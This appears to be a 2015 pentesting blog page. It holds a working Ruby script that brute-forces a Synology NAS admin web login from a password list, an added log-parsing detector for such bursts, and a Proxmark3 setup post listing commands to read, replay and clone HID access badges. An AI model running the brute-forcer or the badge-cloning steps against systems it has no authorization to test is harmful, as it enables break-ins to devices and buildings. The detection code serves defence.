Thursday, January 29, 2015

Writing a web form bruteforcer in Ruby

Testing weak credentials on web applications or devices that use web form authentication is a very common and popular thing to do during pentests. A lot of times you'll come across a device where the only way to interact with it is via the web interface, and that web interface usually requires authentication via submitted form fields.

I decided I wanted to write my own bruteforcer for a Synology NAS I happen to have on hand. People commonly suggest using Nokogiri to interact with and parse webpages. That's all fine and dandy for simpler/more straightforward web code, but when you start getting into web 2.0 stuff, or if you just don't want to deal with it, I've found that Mechanize helps tremendously.

Below is the final code I came up with. It's fairly simple. It reads a file called "passlist.txt", which is the password dictionary, and for every password in that file it attempts a login on the login webpage. It then checks the returned response body for a success or failure indicator. (This is mainly meant as a PoC, not as a tool.)

require 'rubygems'
require 'mechanize'
# This script will brute force the web form login for a Synology NAS.

target = 'https://NASIPHere:5001/webman/index.cgi'
user = 'admin'

agent = Mechanize.new { |a|
    # Skip TLS certificate verification (needed if the NAS uses a self-signed cert)
    a.verify_mode = OpenSSL::SSL::VERIFY_NONE
    # Uncomment to send the requests through a local intercepting proxy
    #a.set_proxy('localhost', 8080)
}

# Read the dictionary one line at a time; the file is closed automatically when the loop ends.
File.foreach("passlist.txt") do |password|
    password = password.chomp # this is important, otherwise the newline will break the auth and everything fails
    page = agent.get target

    # Fill out the login form
    form          = page.form_with :id => 'login-form'
    form.username = user
    form.passwd   = password
    result = form.submit

    # The NAS answers with a small JSON body; key off its "success" flag
    case
    when result.body =~ /"success" : false/ then puts "Failure with #{password}"
    when result.body =~ /"success" : true/ then puts "SUCCESSFUL LOGIN WITH #{password}"
    else puts "Unknown response body when using \"#{password}\": #{result.body}"
    end
end

Running the script yields the following output:

ruby synology-web-form-brute.rb
Failure with admin
SUCCESSFUL LOGIN WITH yoloswag
Failure with kittens

Again, this is not meant to be fancy or groundbreaking, or anything other than some code to copy and paste if you need it.

(There are a variety of tools that will do the same thing or a very similar attack much faster than this, such as hydra/medusa/burp/etc.)
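From the other side of the wire, the script above is easy to spot: every password costs one POST to /webman/index.cgi from the same client address, so a run shows up in the web server's access log as a tight burst of login requests from one IP. The following Ruby is an added example (not code from the post) that parses constructed combined-format access log lines, keeps only POSTs to the login path, and flags any client that makes more than a threshold of attempts inside a sliding time window. The log lines, the window and threshold values, and the user-agent strings are all made up for the example; a real Synology log will look different, but the counting logic is the same.

```ruby
require 'time'

# Constructed sample access log lines (combined log format). 10.0.0.5 is a
# Mechanize loop hammering the login form; 192.168.1.20 is one ordinary login.
# The last line is deliberately malformed to show the parser skipping junk.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [29/Jan/2015:10:00:00 +0000] "GET /webman/index.cgi HTTP/1.1" 200 2048 "-" "Mechanize/2.x"
  10.0.0.5 - - [29/Jan/2015:10:00:01 +0000] "POST /webman/index.cgi HTTP/1.1" 200 45 "-" "Mechanize/2.x"
  10.0.0.5 - - [29/Jan/2015:10:00:02 +0000] "POST /webman/index.cgi HTTP/1.1" 200 45 "-" "Mechanize/2.x"
  10.0.0.5 - - [29/Jan/2015:10:00:03 +0000] "POST /webman/index.cgi HTTP/1.1" 200 45 "-" "Mechanize/2.x"
  10.0.0.5 - - [29/Jan/2015:10:00:04 +0000] "POST /webman/index.cgi HTTP/1.1" 200 45 "-" "Mechanize/2.x"
  10.0.0.5 - - [29/Jan/2015:10:00:05 +0000] "POST /webman/index.cgi HTTP/1.1" 200 45 "-" "Mechanize/2.x"
  192.168.1.20 - - [29/Jan/2015:10:00:10 +0000] "GET /webman/index.cgi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
  192.168.1.20 - - [29/Jan/2015:10:00:25 +0000] "POST /webman/index.cgi HTTP/1.1" 200 44 "-" "Mozilla/5.0"
  10.0.0.5 - - [29/Jan/2015:10:05:00 +0000] "POST /webman/index.cgi HTTP/1.1" 200 45 "-" "Mechanize/2.x"
  this line is garbage and should be skipped
LOG

# One regex for the combined log format; named groups keep the code readable.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+ "[^"]*" "(?<ua>[^"]*)"\z/

Request = Struct.new(:ip, :time, :method, :path, :user_agent)

# Parse a single log line; returns nil for anything that doesn't match.
def parse_line(line)
  m = LOG_RE.match(line.strip)
  return nil unless m
  Request.new(m[:ip],
              Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
              m[:method], m[:path], m[:ua])
end

# Keep only form submissions to the login page (the GETs that fetch the
# form are noise for this purpose).
def login_attempts(log, login_path: '/webman/index.cgi')
  log.each_line.map { |l| parse_line(l) }.compact
     .select { |r| r.method == 'POST' && r.path == login_path }
end

# Largest number of timestamps that fall inside any window of `window` seconds.
def max_in_window(times, window)
  times = times.sort
  best = 0
  start = 0
  times.each_with_index do |t, i|
    start += 1 while t - times[start] > window
    best = [best, i - start + 1].max
  end
  best
end

# Map of ip => peak attempts-per-window for every client at or above threshold.
def flag_bursts(attempts, window: 60, threshold: 5)
  attempts.group_by(&:ip).each_with_object({}) do |(ip, reqs), flagged|
    peak = max_in_window(reqs.map(&:time), window)
    flagged[ip] = peak if peak >= threshold
  end
end

if __FILE__ == $0
  flag_bursts(login_attempts(SAMPLE_LOG)).each do |ip, peak|
    puts "#{ip}: #{peak} login POSTs within 60s, looks like a dictionary run"
  end
end
```

The window/threshold pair is the knob to tune: a human mistyping a password a few times stays well under five submissions a minute, while a dictionary loop like the one above clears it in seconds. Pairing the count with a user-agent check (the log shows Mechanize's default UA rather than a browser) gives a second, cheap signal.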

Tuesday, January 6, 2015

Getting the Proxmark3 working

I recently got a Proxmark3 for RFID testing and had to get the environment set up properly. I downloaded the precompiled client tools the manual suggests, but they kept asking for a specific version of GLIBC that I could not find packages for, for the life of me. I ended up getting the source code off their GitHub and compiling the client tools right there. Works perfectly.

1. Download the 64-bit version of Kali
2. Set up a virtual machine (or install to disk) with Kali on it
3. git clone https://github.com/Proxmark/proxmark3
4. cd into the proxmark3/client directory
5. Run make to compile the client
6. Start the client with ./proxmark3 /dev/ttyACM0 (or whatever device it shows up as for you)

Now it should drop you into the Proxmark3 interactive shell. Here you can do things like read basic corporate badges with 'lf hid fskdemod', play them back with 'lf hid sim codehere', or clone the cards onto physical T55x7 cards.

In any case, here are some important links:
Source: https://github.com/Proxmark/proxmark3
Proxbrute and other utilities: http://www.mcafee.com/us/resources/white-papers/foundstone/wp-proxbrute.pdf
Github Wiki: https://github.com/Proxmark/proxmark3/wiki/commands
User Manual (for my version): http://ryscc.com/products/PM3PRD/dl/PM3-UserGuide-20140401.pdf